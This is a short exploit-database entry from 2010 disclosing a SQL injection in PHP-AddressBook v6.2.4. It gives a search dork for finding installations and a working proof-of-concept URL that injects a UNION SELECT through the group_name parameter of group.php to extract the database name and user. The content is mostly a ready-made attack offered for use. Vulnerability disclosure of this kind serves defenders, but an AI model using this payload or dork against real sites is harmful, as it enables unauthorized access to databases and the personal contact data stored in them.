PHP-AddressBook v6.2.4 (group.php) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP-AddressBook v6.2.4 (group.php) SQL Injection Vulnerability
# Published : 2010-12-29
# Author : hiphop
# Previous Title : Amoeba CMS v1.01 multiple remote vulnerabilities
# Next Title : DzTube SQL Injection Vulnerability

#Exploit Title    :  PHP-AddressBook v6.2.4 SQL INJECTION VULNERABILITIES
#Script   : PHP-AddressBook v6.2.4
#Language : PHP
#DESCRIPTION:Simple, web-based address & phone book, contact manager, organizer. Groups, addresses, e-Mails, phone numbers & birthdays. vCards, LDIF, Excel, iPhone, Gmail & Google-Maps supported
#Download : http://php-addressbook.sourceforge.net/download
#DORK: "php-addressbook"
#Date     : 2010/12/29
#Found    : by hiphop
#thanks :silly3r


proof of concept:

Condition: magic_quotes_gpc = off

http://server/group.php?group_name=1'+union+select+1,2,3,4,5,6,7,concat(database(),0x3a,user()),9'